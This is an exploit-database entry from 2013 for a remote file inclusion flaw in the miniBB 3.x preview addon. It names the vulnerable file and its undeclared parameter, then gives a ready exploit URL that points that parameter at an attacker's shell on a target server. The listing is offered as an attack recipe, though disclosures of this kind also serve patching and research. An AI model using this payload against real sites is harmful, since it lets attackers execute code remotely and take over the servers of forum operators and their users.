miniBB 3.x Addon preview Remote File Include Vulnerability

2013-01-27T00:00:00
ID 1337DAY-ID-20238
Type zdt
Reporter bd0rk
Modified 2013-01-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: miniBB 3.x Addon preview Remote File Include Vulnerability
# Date: 2013-01-27
# Author: bd0rk
# Vendor or Software Link: http://www.minibb.com/download.php?file=minibb_plugin_preview
# Version: for miniBB 3.x
# Category:: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Ubuntu-Linux

------------------------------------------------------------------------

I found vulnerable code infile addon_preview.php line: 12

So an attacker can use it to compromise the system.

Not declared before &require parameter is: $pathToFiles
------------------------------------------------------------------------
[+]spl0iT: http://[target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
------------------------------------------------------------------------

Greetings from cold Germany,bd0rk.

==> REST IN PEACE AARON SWARTZ <==

#  0day.today [2018-03-28]  #